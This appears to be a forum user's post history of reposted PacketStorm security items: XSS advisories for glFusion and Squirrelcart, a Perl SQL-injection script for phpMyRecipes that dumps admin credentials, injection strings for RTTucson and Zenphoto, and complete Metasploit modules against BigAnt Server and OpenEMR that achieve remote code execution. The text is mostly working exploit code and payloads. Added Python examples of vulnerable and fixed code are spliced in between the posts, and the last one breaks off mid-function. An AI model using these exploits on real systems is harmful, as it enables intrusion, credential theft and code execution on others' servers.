Everything posted by Praetorian503

  1. glFusion version 1.2.2 suffers from multiple cross site scripting vulnerabilities.

     Advisory ID: HTB23142
     Product: glFusion
     Vendor: http://www.glfusion.org/
     Vulnerable Version(s): 1.2.2 and probably prior
     Tested Version: 1.2.2
     Vendor Notification: January 30, 2013
     Vendor Patch: January 30, 2013
     Public Disclosure: February 20, 2013
     Vulnerability Type: Cross-Site Scripting [CWE-79]
     CVE Reference: CVE-2013-1466
     Risk Level: Medium
     CVSSv2 Base Score: 4.3 (AV:N/AC:M/Au:N/C:N/I:P/A:N)
     Solution Status: Fixed by Vendor
     Discovered and Provided: High-Tech Bridge Security Research Lab ( https://www.htbridge.com/advisory/ )

     -----------------------------------------------------------------------------------------------

     Advisory Details:

     High-Tech Bridge Security Research Lab discovered multiple XSS vulnerabilities in glFusion, which can be exploited to perform Cross-Site Scripting attacks.

     glFusion has a "bad_behaviour" plugin (installed by default) that verifies the HTTP Referer, aimed at protecting against spambots. The plugin also makes reflected XSS attacks against the application a little bit more complex. To bypass the security restriction, the PoC (Proof-of-Concept) codes for vulnerabilities 1.1 – 1.3 modify the HTTP Referer header. These PoCs were successfully tested in the latest available version of Mozilla Firefox (18.0.1).

     1) Multiple Cross-Site Scripting (XSS) in glFusion: CVE-2013-1466

     1.1 The vulnerability exists due to insufficient filtration of user-supplied data in the "subject" HTTP POST parameter passed to the "/profiles.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

     The PoC code below uses the "alert()" JavaScript function to display the user's cookies:

         <html>
         <head>
         <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
         </head>
         <body>
         <script>
         var x = 0
         function go2() {
           location.replace("")
         }
         function go() {
           if(x) return
           x += 1
           try {
             var html = '<form target="_parent" action="http://[host]/profiles.php" method="post">'
             html += '<input type="hidden" name="uid" value="2">'
             html += '<input type="hidden" name="author" value="author">'
             html += '<input type="hidden" name="message" value="1">'
             html += '<input type="hidden" name="message_html" value="1">'
             html += '<input type="hidden" name="authoremail" value="mail@mail.com">'
             html += '<input type="hidden" name="postmode" value="html">'
             html += '<input type="hidden" name="what" value="contact">'
             html += '<input type="hidden" name="subject" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'
             window.frames[0].document.body.innerHTML = html
             window.frames[0].document.forms[0].submit()
           } catch(e) {
             go2()
           }
         }
         </script>
         <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
         </iframe>
         <script>
         window.setTimeout('go2()', 3333)
         </script>
         </body>
         </html>

     1.2 The vulnerabilities exist due to insufficient filtration of user-supplied data in the "address1", "address2", "calendar_type", "city", "state", "title", "url" and "zipcode" HTTP POST parameters passed to the "/calendar/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the user's browser in the context of the vulnerable website.

     The PoC code below uses the "alert()" JavaScript function to display the user's cookies:

         <html>
         <head>
         <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
         </head>
         <body>
         <script>
         var x = 0
         function go2() {
           location.replace("")
         }
         function go() {
           if(x) return
           x += 1
           try {
             var html = '<form target="_parent" action="http://[host]/calendar/index.php" method="post">'
             html += '<input type="hidden" name="mode" value="Submit">'
             html += '<input type="hidden" name="savecal" value="Submit">'
             html += '<input type="hidden" name="address1" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
             html += '<input type="hidden" name="calendar_type" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
             html += '<input type="hidden" name="city" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
             html += '<input type="hidden" name="state" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
             html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
             html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
             html += '<input type="hidden" name="zipcode" value=\'" onmouseover="javascript:alert(document.cookie);"\'>'
             html += '<input type="hidden" name="address2" value=\'" onmouseover="javascript:alert(document.cookie);"\'></form>'
             window.frames[0].document.body.innerHTML = html
             window.frames[0].document.forms[0].submit()
           } catch(e) {
             go2()
           }
         }
         </script>
         <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
         </iframe>
         <script>
         window.setTimeout('go2()', 3333)
         </script>
         </body>
         </html>

     1.3 The vulnerabilities exist due to insufficient filtration of user-supplied data in the "title" and "url" HTTP POST parameters passed to the "/links/index.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

     The PoC code below uses the "alert()" JavaScript function to display the user's cookies:

         <html>
         <head>
         <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
         </head>
         <body>
         <script>
         var x = 0
         function go2() {
           location.replace("")
         }
         function go() {
           if(x) return
           x += 1
           try {
             var html = '<form target="_parent" action="http://[host]/links/index.php" method="post">'
             html += '<input type="hidden" name="mode" value="Submit">'
             html += '<input type="hidden" name="title" value=\'" onmouseover="javascript:alert(1);"\'>'
             html += '<input type="hidden" name="url" value=\'" onmouseover="javascript:alert(2);"\'></form>'
             window.frames[0].document.body.innerHTML = html
             window.frames[0].document.forms[0].submit()
           } catch(e) {
             go2()
           }
         }
         </script>
         <iframe onload="window.setTimeout('go()', 99)" src="about:blank" style="visibility:hidden">
         </iframe>
         <script>
         window.setTimeout('go2()', 3333)
         </script>
         </body>
         </html>

     1.4 The vulnerability exists due to insufficient filtration of user-supplied data in the URI after the "/admin/plugins/mediagallery/xppubwiz.php" script. A remote attacker can trick a logged-in user into opening a specially crafted link and execute arbitrary HTML and script code in the browser in the context of the vulnerable website.

     The PoC code below uses the "alert()" JavaScript function to display the user's cookies:

         http://[host]/admin/plugins/mediagallery/xppubwiz.php/%22%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E/

     -----------------------------------------------------------------------------------------------

     Solution:

     Upgrade to glFusion v1.2.2.pl4

     More Information:
     http://www.glfusion.org/article.php/glf122_update_20130130_01
     http://www.glfusion.org/filemgmt/viewcat.php?cid=1

     -----------------------------------------------------------------------------------------------

     References:

     [1] High-Tech Bridge Advisory HTB23142 - https://www.htbridge.com/advisory/HTB23142 - Multiple Cross-Site Scripting (XSS) in glFusion.
     [2] glFusion - http://www.glfusion.org/ - glFusion is an open source content management system developed in PHP providing blog, forum, gallery, downloads.
     [3] Common Vulnerabilities and Exposures (CVE) - http://cve.mitre.org/ - international in scope and free for public use, CVE® is a dictionary of publicly known information security vulnerabilities and exposures.
     [4] Common Weakness Enumeration (CWE) - http://cwe.mitre.org - targeted to developers and security practitioners, CWE is a formal list of software weakness types.

     -----------------------------------------------------------------------------------------------

     Disclaimer: The information provided in this Advisory is provided "as is" and without any warranty of any kind. Details of this Advisory may be updated in order to provide as accurate information as possible. The latest version of the Advisory is available on web page [1] in the References.

     Source: PacketStorm
  2. phpMyRecipes version 1.2.2 remote SQL injection exploit.

         #phpMyRecipes 1.2.2 SQL Injection Exploit
         #By cr4wl3r http://bastardlabs.info
         #Script: http://sourceforge.net/projects/php-myrecipes/files/
         #Demo: http://bastardlabs.info/demo/phpMyRecipes.png
         #Tested: Ubuntu Linux
         #
         # Bugs found in viewrecipe.php
         #
         #   $r_id = $_GET['r_id'];
         #
         #   if (! ($result = mysql_query("SELECT
         #   name,category,servings,ingredients,instructions,description,creator,editor,imagefile FROM recipes WHERE id=$r_id"))) {
         #       dberror("viewrecipe.php", "Cannot select recipe");
         #   }
         #
         # http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=[SQLi]
         # Example: http://bastardlabs/[path]/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users
         #
         #
         # $ perl recipes.pl localhost /demo/
         # [+] Please Wait ...
         #
         # [+] Getting Username and Password [ ok ]
         # [+] w00tw00t
         # [+] Username | Password --> admin:mps4BNRRjh3po

         #!/usr/bin/perl
         use IO::Socket;

         $host = $ARGV[0];
         $path = $ARGV[1];

         if (@ARGV < 2) {
             print qq(
         +---------------------------------------------+
         |  phpMyRecipes 1.2.2 SQL Injection Exploit   |
         |                                             |
         |        coded & exploited by cr4wl3r         |
         |         http://bastardlabs.info/            |
         +---------------------------------------------+
                            -=[X]=-
         +---------------------------------------
          Usage : perl $0 <host> <path>
          ex    : perl $0 127.0.0.1 /phpMyRecipes/
         +---------------------------------------
         );
             exit;   # usage printed; the original fell through with an undefined host
         }

         $target = "http://".$host.$path."/recipes/viewrecipe.php?r_id=NULL/**/UNION/**/ALL/**/SELECT/**/CONCAT(username,0x3a,password)GORONTALO,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL/**/FROM/**/users";

         $sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$host", PeerPort=>"80")
             || die "[-] Can't connect to Server [ failed ]\n";

         print "[+] Please Wait ...\n";
         print $sock "GET $target HTTP/1.1\n";
         print $sock "Accept: */*\n";
         print $sock "User-Agent: BastardLabs\n";
         print $sock "Host: $host\n";
         print $sock "Connection: close\n\n";
         sleep 2;

         while ($answer = <$sock>) {
             # the injected CONCAT(username,0x3a,password) is echoed back inside <B>...</B>
             if ($answer =~ /<B>(.*?)<\/B>/) {
                 print "\n[+] Getting Username and Password [ ok ]\n";
                 sleep 1;
                 print "[+] w00tw00t\n";
                 print "[+] Username | Password --> $1\n";
                 exit();
             }
         }
         print "[-] Exploit Failed !\n";

     Source: PacketStorm
  3. RTTucson Quotations Database Script suffers from a remote SQL injection vulnerability that allows for authentication bypass.

     # RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability
     # By cr4wl3r http://bastardlabs.info
     # Script: http://www.rttucson.com/files.html
     # Bugs found /quotations/admin/include/login.php

     ---------------------------
         if ($_POST['submit']) {

             $Username = $_POST['Username'];
             $Password = md5($_POST['Password']);

             $query = "SELECT * from UsersTBL WHERE Username='$Username' AND Password='$Password'";
             $result = mysql_query($query) or die ( mysql_error() );
     ---------------------------

     Proof of Concept

     http://bastardlabs/[path]/admin/include/login.php
     Username: 'or'1=1
     Password: cr4wl3r

     Source: PacketStorm
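The two injections above (the unquoted `r_id` in phpMyRecipes and the quoted `Username` in the RTTucson login) are the same defect: request data is pasted into the SQL text. The block below is an added example, not code from either post, contrasting that string building with bound parameters on an in-memory SQLite database; the schema and credential values are constructed, and the login tautology is written as `' OR 1=1 OR '` so that it survives the trailing `AND Password=` clause.

```python
import sqlite3

# Constructed stand-in for the two applications' tables (not the real schema).
def build_db():
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE recipes (id INTEGER, name TEXT);
        INSERT INTO recipes VALUES (1, 'pancakes');
        CREATE TABLE users (username TEXT, password TEXT);
        INSERT INTO users VALUES ('admin', 'example-hash');
    """)
    return db

# The post's UNION payload in SQLite syntax (|| instead of CONCAT, one column).
UNION_PAYLOAD = "NULL/**/UNION/**/ALL/**/SELECT/**/username||':'||password/**/FROM/**/users"
# Tautology for the login, shaped so it survives the "AND password=..." that follows.
LOGIN_PAYLOAD = "' OR 1=1 OR '"

# Vulnerable: r_id is interpolated unquoted, exactly as viewrecipe.php does it,
# so a UNION in the parameter becomes part of the statement.
def recipe_names_vulnerable(db, r_id):
    sql = "SELECT name FROM recipes WHERE id=" + r_id
    return [row[0] for row in db.execute(sql)]

# Fixed: r_id must be an integer and is bound as a parameter.
def recipe_names_fixed(db, r_id):
    try:
        rid = int(r_id)
    except ValueError:
        return []                      # non-numeric id is rejected outright
    return [row[0] for row in db.execute("SELECT name FROM recipes WHERE id=?", (rid,))]

# Vulnerable: the same string building as the login.php excerpt.
def login_vulnerable(db, username, password_hash):
    sql = ("SELECT * FROM users WHERE username='" + username +
           "' AND password='" + password_hash + "'")
    return db.execute(sql).fetchone() is not None

# Fixed: both values bound; quotes in the input are data, not syntax.
def login_fixed(db, username, password_hash):
    sql = "SELECT * FROM users WHERE username=? AND password=?"
    return db.execute(sql, (username, password_hash)).fetchone() is not None
```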
  4. Zenphoto version 1.4.4.1 suffers from a remote blind SQL injection vulnerability.

     Exploit Title : Zenphoto ver 1.4.4.1 Blind SQL Injection
     Author : HosseinNsn
     Home : http://Emperor-Team.Org
     Software Link : http://www.zenphoto.org
     Security Risk : High
     Version : 1.4.4.1
     Tested on : Linux - Windows
     Google Dork : "Powered by Zenphoto"

     Exploit :

         [Target]/index.php?rss=undefined+and+1%3D0?=en    [Blind SQL Injection]

     SPL TNX : Mr.F@RDIN . Mr.Milad . Expl0!ter . arash 281 . ??.????@? . M?.MOHS3N . Mr.SobhaN S[s]S . H0553|N7 . IrIsT . Mr.Treh . H@M3D . hono . EhsanAvr . Invisible . bl4ckcod3r . MR.ARTAN . ??.??????? . WANTED . Mr.Amir

     Source: PacketStorm
  5. This Metasploit module exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The vulnerability is due to the dangerous usage of strcpy while handling errors. This module uses a combination of SCH and DUPF requests to trigger the vulnerability, and has been tested successfully against version 2.97 SP7 over Windows XP SP3 and Windows 2003 SP2.

         ##
         # This file is part of the Metasploit Framework and may be subject to
         # redistribution and commercial restrictions. Please see the Metasploit
         # web site for more information on licensing and terms of use.
         # http://metasploit.com/
         ##

         require 'msf/core'

         class Metasploit3 < Msf::Exploit::Remote
           Rank = NormalRanking

           include Msf::Exploit::Remote::Tcp

           def initialize(info = {})
             super(update_info(info,
               'Name'           => 'BigAnt Server 2 SCH And DUPF Buffer Overflow',
               'Description'    => %q{
                   This exploits a stack buffer overflow in BigAnt Server 2.97 SP7. The
                 vulnerability is due to the dangerous usage of strcpy while handling errors.
                 This module uses a combination of SCH and DUPF request to trigger the
                 vulnerability, and has been tested successfully against version 2.97 SP7
                 over Windows XP SP3 and Windows 2003 SP2.
               },
               'Author'         =>
                 [
                   'Hamburgers Maccoy', # Vulnerability discovery
                   'juan vazquez'       # Metasploit module
                 ],
               'License'        => MSF_LICENSE,
               'References'     =>
                 [
                   [ 'CVE', '2012-6275' ],
                   [ 'US-CERT-VU', '990652' ],
                   [ 'BID', '57214' ],
                   [ 'OSVDB', '89344' ]
                 ],
               'Payload'        =>
                 {
                   'Space'          => 2500,
                   'BadChars'       => "\x00\x0a\x0d\x25\x27",
                   'DisableNops'    => true,
                   'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
                 },
               'Platform'       => 'win',
               'Targets'        =>
                 [
                   [ 'BigAnt Server 2.97 SP7 / Windows XP SP3',
                     {
                       'Offset'     => 629,
                       'Ret'        => 0x77c21ef4, # ppr from msvcrt
                       'JmpESP'     => 0x77c35459, # push esp # ret from msvcrt
                       'FakeObject' => 0x77C60410  # .data from msvcrt
                     }
                   ],
                   [ 'BigAnt Server 2.97 SP7 / Windows 2003 SP2',
                     {
                       'Offset'     => 629,
                       'Ret'        => 0x77bb287a, # ppr from msvcrt
                       'FakeObject' => 0x77bf2460, # .data from msvcrt
                       :callback_rop => :w2003_sp2_rop
                     }
                   ]
                 ],
               'Privileged'     => true,
               'DefaultTarget'  => 0,
               'DisclosureDate' => 'Jan 09 2013'))

             register_options([Opt::RPORT(6661)], self.class)
           end

           def junk(n=4)
             return rand_text_alpha(n).unpack("V")[0].to_i
           end

           def nop
             return make_nops(4).unpack("V")[0].to_i
           end

           def w2003_sp2_rop
             rop_gadgets =
             [
               0x77bc5d88, # POP EAX # RETN
               0x77ba1114, # <- *&VirtualProtect()
               0x77bbf244, # MOV EAX,DWORD PTR DS:[EAX] # POP EBP # RETN
               junk,
               0x77bb0c86, # XCHG EAX,ESI # RETN
               0x77bc9801, # POP EBP # RETN
               0x77be2265, # ptr to 'push esp # ret'
               0x77bc5d88, # POP EAX # RETN
               0x03C0990F,
               0x77bdd441, # SUB EAX, 03c0940f (dwSize, 0x500 -> ebx)
               0x77bb48d3, # POP EBX, RET
               0x77bf21e0, # .data
               0x77bbf102, # XCHG EAX,EBX # ADD BYTE PTR DS:[EAX],AL # RETN
               0x77bbfc02, # POP ECX # RETN
               0x77bef001, # W pointer (lpOldProtect) (-> ecx)
               0x77bd8c04, # POP EDI # RETN
               0x77bd8c05, # ROP NOP (-> edi)
               0x77bc5d88, # POP EAX # RETN
               0x03c0984f,
               0x77bdd441, # SUB EAX, 03c0940f
               0x77bb8285, # XCHG EAX,EDX # RETN
               0x77bc5d88, # POP EAX # RETN
               nop,
               0x77be6591, # PUSHAD # ADD AL,0EF # RETN
             ].pack("V*")

             return rop_gadgets
           end

           def exploit
             sploit = rand_text_alpha(target['Offset'])
             sploit << [target.ret].pack("V")
             sploit << [target['FakeObject']].pack("V")
             sploit << [target['FakeObject']].pack("V")
             if target[:callback_rop] and self.respond_to?(target[:callback_rop])
               sploit << self.send(target[:callback_rop])
             else
               sploit << [target['JmpESP']].pack("V")
             end
             sploit << payload.encoded

             random_filename = rand_text_alpha(4)
             random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}"
             random_userid = rand_text_numeric(1)
             random_username = rand_text_alpha_lower(5)
             random_content = rand_text_alpha(10 + rand(10))

             sch = "SCH 16\n"
             sch << "cmdid: 1\n"
             sch << "content-length: 0\n"
             sch << "content-type: Appliction/Download\n"
             sch << "filename: #{random_filename}.txt\n"
             sch << "modified: #{random_date}\n"
             sch << "pclassid: 102\n"
             sch << "pobjid: 1\n"
             sch << "rootid: 1\n"
             sch << "sendcheck: 1\n"
             sch << "source_cmdname: DUPF\n"
             sch << "source_content-length: 116619\n"
             sch << "userid: #{random_userid}\n"
             sch << "username: #{sploit}\n\n"

             print_status("Trying target #{target.name}...")
             connect
             print_status("Sending SCH request...")
             sock.put(sch)
             res = sock.get_once

             if res.nil?
               fail_with(Exploit::Failure::Unknown, "No response to the SCH request")
             end

             if res =~ /scmderid: \{(.*)\}/
               scmderid = $1
             else
               fail_with(Exploit::Failure::UnexpectedReply, "scmderid value not found in the SCH response")
             end

             dupf = "DUPF 16\n"
             dupf << "cmdid: 1\n"
             dupf << "content-length: #{random_content.length}\n"
             dupf << "content-type: Appliction/Download\n"
             dupf << "filename: #{random_filename}.txt\n"
             dupf << "modified: #{random_date}\n"
             dupf << "pclassid: 102\n"
             dupf << "pobjid: 1\n"
             dupf << "rootid: 1\n"
             dupf << "scmderid: {#{scmderid}}\n"
             dupf << "sendcheck: 1\n"
             dupf << "userid: #{random_userid}\n"
             dupf << "username: #{random_username}\n\n"
             dupf << random_content

             print_status("Sending DUPF request...")
             sock.put(dupf)
             #sock.get_once
             disconnect
           end

         end

     Source: PacketStorm
  6. This Metasploit module exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7. A lack of authentication allows unauthenticated file uploads through a DUPF command. Additionally, the filename option in the same command can be used to launch a directory traversal attack and achieve arbitrary file upload. The module uses the Windows Management Instrumentation service to execute an arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003. It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3 and 2003 SP2.

         ##
         # This file is part of the Metasploit Framework and may be subject to
         # redistribution and commercial restrictions. Please see the Metasploit
         # web site for more information on licensing and terms of use.
         # http://metasploit.com/
         ##

         require 'msf/core'

         class Metasploit3 < Msf::Exploit::Remote
           Rank = ExcellentRanking

           include Msf::Exploit::Remote::Tcp
           include Msf::Exploit::EXE
           include Msf::Exploit::WbemExec
           include Msf::Exploit::FileDropper

           def initialize(info = {})
             super(update_info(info,
               'Name'           => 'BigAnt Server DUPF Command Arbitrary File Upload',
               'Description'    => %q{
                   This exploits an arbitrary file upload vulnerability in BigAnt Server 2.97 SP7.
                 A lack of authentication allows to make unauthenticated file uploads through a
                 DUPF command. Additionally the filename option in the same command can be used
                 to launch a directory traversal attack and achieve arbitrary file upload. The
                 module uses the Windows Management Instrumentation service to execute an
                 arbitrary payload on vulnerable installations of BigAnt on Windows XP and 2003.
                 It has been successfully tested on BigAnt Server 2.97 SP7 over Windows XP SP3
                 and 2003 SP2.
               },
               'Author'         =>
                 [
                   'Hamburgers Maccoy', # Vulnerability discovery
                   'juan vazquez'       # Metasploit module
                 ],
               'License'        => MSF_LICENSE,
               'References'     =>
                 [
                   [ 'CVE', '2012-6274' ],
                   [ 'US-CERT-VU', '990652' ],
                   [ 'BID', '57214' ],
                   [ 'OSVDB', '89342' ]
                 ],
               'Privileged'     => true,
               'Platform'       => 'win',
               'Targets'        =>
                 [
                   [ 'BigAnt Server 2.97 SP7', { } ]
                 ],
               'DefaultTarget'  => 0,
               'DefaultOptions' =>
                 {
                   'WfsDelay' => 10
                 },
               'DisclosureDate' => 'Jan 09 2013'))

             register_options(
               [
                 Opt::RPORT(6661),
                 OptInt.new('DEPTH', [true, "Levels to reach base directory", 6])
               ], self.class)
           end

           def upload_file(filename, content)
             random_date = "#{rand_text_numeric(4)}-#{rand_text_numeric(2)}-#{rand_text_numeric(2)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)}"

             dupf = "DUPF 16\n"
             dupf << "cmdid: 1\n"
             dupf << "content-length: #{content.length}\n"
             dupf << "content-type: Appliction/Download\n"
             # DEPTH levels of "\.." walk from the upload folder up to the drive root
             dupf << "filename: #{"\\.." * datastore['DEPTH']}\\#{filename}\n"
             dupf << "modified: #{random_date}\n"
             dupf << "pclassid: 102\n"
             dupf << "pobjid: 1\n"
             dupf << "rootid: 1\n"
             dupf << "sendcheck: 1\n\n"
             dupf << content

             print_status("sending DUPF")
             connect
             sock.put(dupf)
             res = sock.get_once
             disconnect

             return res
           end

           def exploit
             peer = "#{rhost}:#{rport}"

             # Setup the necessary files to do the wbemexec trick
             exe_name = rand_text_alpha(rand(10)+5) + '.exe'
             exe = generate_payload_exe
             mof_name = rand_text_alpha(rand(10)+5) + '.mof'
             mof = generate_mof(mof_name, exe_name)

             print_status("#{peer} - Sending HTTP ConvertFile Request to upload the exe payload #{exe_name}")
             res = upload_file("WINDOWS\\system32\\#{exe_name}", exe)
             if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/
               print_good("#{peer} - #{exe_name} uploaded successfully")
             else
               if res and res =~ /ERR 9/ and res =~ /#{exe_name}/ and res =~ /lasterror: 183/
                 print_error("#{peer} - Upload failed, check the DEPTH option")
               end
               fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{exe_name}")
             end

             print_status("#{peer} - Sending HTTP ConvertFile Request to upload the mof file #{mof_name}")
             res = upload_file("WINDOWS\\system32\\wbem\\mof\\#{mof_name}", mof)
             if res and res =~ /DUPF/ and res =~ /fileid: (\d+)/
               print_good("#{peer} - #{mof_name} uploaded successfully")
               register_file_for_cleanup(exe_name)
               register_file_for_cleanup("wbem\\mof\\good\\#{mof_name}")
             else
               # the error reply names the file that failed, i.e. the mof here
               if res and res =~ /ERR 9/ and res =~ /#{mof_name}/ and res =~ /lasterror: 183/
                 print_error("#{peer} - Upload failed, check the DEPTH option")
               end
               fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Failed to upload #{mof_name}")
             end
           end

         end

     Source: PacketStorm
  7. This Metasploit module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the ofc_upload_image.php file from the openflashchart library, a malicious user can upload a file to the tmp-upload-images directory without any authentication, which results in arbitrary code execution. The module has been tested successfully on OpenEMR 4.1.1 over Ubuntu 10.04.

         ##
         # This file is part of the Metasploit Framework and may be subject to
         # redistribution and commercial restrictions. Please see the Metasploit
         # Framework web site for more information on licensing and terms of use.
         # http://metasploit.com/framework/
         ##

         require 'msf/core'

         class Metasploit3 < Msf::Exploit::Remote
           Rank = ExcellentRanking

           include Msf::Exploit::Remote::HttpClient
           include Msf::Exploit::FileDropper

           def initialize(info={})
             super(update_info(info,
               'Name'           => "OpenEMR PHP File Upload Vulnerability",
               'Description'    => %q{
                   This module exploits a vulnerability found in OpenEMR 4.1.1. By abusing the
                 ofc_upload_image.php file from the openflashchart library, a malicious user can
                 upload a file to the tmp-upload-images directory without any authentication, which
                 results in arbitrary code execution. The module has been tested successfully on
                 OpenEMR 4.1.1 over Ubuntu 10.04.
               },
               'License'        => MSF_LICENSE,
               'Author'         =>
                 [
                   'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
                   'juan vazquez'                            # Metasploit module
                 ],
               'References'     =>
                 [
                   [ 'OSVDB', '90222' ],
                   [ 'BID', '37314' ],
                   [ 'EBD', '24492' ],
                   [ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
                   [ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
                 ],
               'Platform'       => ['php'],
               'Arch'           => ARCH_PHP,
               'Targets'        =>
                 [
                   ['OpenEMR 4.1.1', {}]
                 ],
               'Privileged'     => false,
               'DisclosureDate' => "Feb 13 2013",
               'DefaultTarget'  => 0))

             register_options(
               [
                 OptString.new('TARGETURI', [true, 'The base path to OpenEMR', '/openemr'])
               ], self.class)
           end

           def check
             uri = target_uri.path
             peer = "#{rhost}:#{rport}"

             # Check version
             print_status("#{peer} - Trying to detect installed version")

             res = send_request_cgi({
               'method' => 'GET',
               'uri'    => normalize_uri(uri, "interface", "login", "login.php")
             })

             if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
               version = $1
             else
               return Exploit::CheckCode::Unknown
             end

             print_status("#{peer} - Version #{version} detected")

             if version > "4.1.1"
               return Exploit::CheckCode::Safe
             end

             # Check for vulnerable component
             print_status("#{peer} - Trying to detect the vulnerable component")

             res = send_request_cgi({
               'method' => 'GET',
               'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
             })

             if res and res.code == 200 and res.body =~ /Saving your image to/
               return Exploit::CheckCode::Detected
             end

             return Exploit::CheckCode::Safe
           end

           def exploit
             uri = target_uri.path
             peer = "#{rhost}:#{rport}"

             payload_name = rand_text_alpha(rand(10) + 5) + '.php'
             my_payload = payload.encoded

             print_status("#{peer} - Sending PHP payload (#{payload_name})")
             res = send_request_raw({
               'method'  => 'POST',
               'uri'     => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
               'headers' => {
                 "Content-Length" => my_payload.length.to_s
               },
               'data'    => my_payload
             })

             # If the server returns 200 and the body contains our payload name,
             # we assume we uploaded the malicious file successfully
             if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
               fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
             end

             register_file_for_cleanup(payload_name)

             print_status("#{peer} - Executing PHP payload (#{payload_name})")
             # Execute our payload
             res = send_request_cgi({
               'method' => 'GET',
               'uri'    => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
             })

             # If we don't get a 200 when we request our malicious payload, we suspect
             # we don't have a shell, either. Print the status code for debugging purposes.
             if res and res.code != 200
               print_error("#{peer} - Server returned #{res.code.to_s}")
             end
           end
         end

     Source: PacketStorm
  8. Squirrelcart version 3.5.4 suffers from a reflective cross site scripting vulnerability.

     Squirrelcart v3.5.4 (table) Remote Cross-Site Scripting Vulnerability

     Vendor: Lighthouse Development
     Product web page: http://www.squirrelcart.com
     Affected version: v2.0.0 - 3.5.4

     Summary: Squirrelcart PHP Shopping Cart software is a fully customizable, robust php shopping cart, designed with the advanced developer and web novice in mind.

     Desc: Squirrelcart suffers from an XSS issue due to a failure to properly sanitize user-supplied input to the 'table' GET parameter in the 'index.php' script. Attackers can exploit this weakness to execute arbitrary HTML and script code in a user's browser session.

     Tested on: Linux, Apache, PHP, MySQL

     Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
     @zeroscience.mk

     Vendor status:
     [17.02.2013] Vulnerability discovered.
     [19.02.2013] Contact with the vendor.
     [19.02.2013] Vendor responds asking more details.
     [19.02.2013] Sent details to the vendor.
     [19.02.2013] Vendor confirms the vulnerability.
     [19.02.2013] Vendor releases version 3.5.5 to address this issue.
     [19.02.2013] Coordinated public security advisory released.

     Advisory ID: ZSL-2013-5128
     Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5128.php
     Vendor ID: SC130218
     Vendor URL: http://www.squirrelcart.com/downloads.php
     Vendor Patch: http://www.squirrelcart.com/index.php?downloads=1&id=123

     17.02.2013

     --

         http://192.168.16.101/index.php?show_record_links=1&table=Products"><script>alert(251);</script>&add_new_item=1

     Source: PacketStorm
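Both reflected XSS reports on this page (glFusion's `" onmouseover="..."` in form fields, Squirrelcart's `"><script>` in the `table` parameter) work by breaking out of the HTML context the value lands in. Added example, not code from either advisory: a constructed render of an input attribute and of a link, each in its vulnerable form and with context-appropriate escaping, checked with Python's own HTML parser rather than a regex; the template fragments are assumptions, not the applications' code.

```python
import html
from html.parser import HTMLParser
from urllib.parse import quote

# The two payload strings quoted in the advisories above.
ATTR_PAYLOAD = '" onmouseover="javascript:alert(document.cookie);"'
TAG_PAYLOAD = 'Products"><script>alert(251);</script>'

# Assumed templates: a calendar form echoing "city" into an attribute and a
# shop page echoing "table" into a link (constructed, not the apps' code).
def render_input_vulnerable(city):
    return '<input type="text" name="city" value="' + city + '">'

def render_input_fixed(city):
    # quote=True also encodes " and ', so the value cannot end the attribute
    # and start a new one such as onmouseover=...
    return '<input type="text" name="city" value="' + html.escape(city, quote=True) + '">'

def render_link_vulnerable(table):
    return '<a href="index.php?table=' + table + '">' + table + '</a>'

def render_link_fixed(table):
    # URL context first (percent-encode the parameter), then HTML-escape for
    # the attribute; the visible text gets plain HTML escaping.
    href = html.escape("index.php?table=" + quote(table, safe=""), quote=True)
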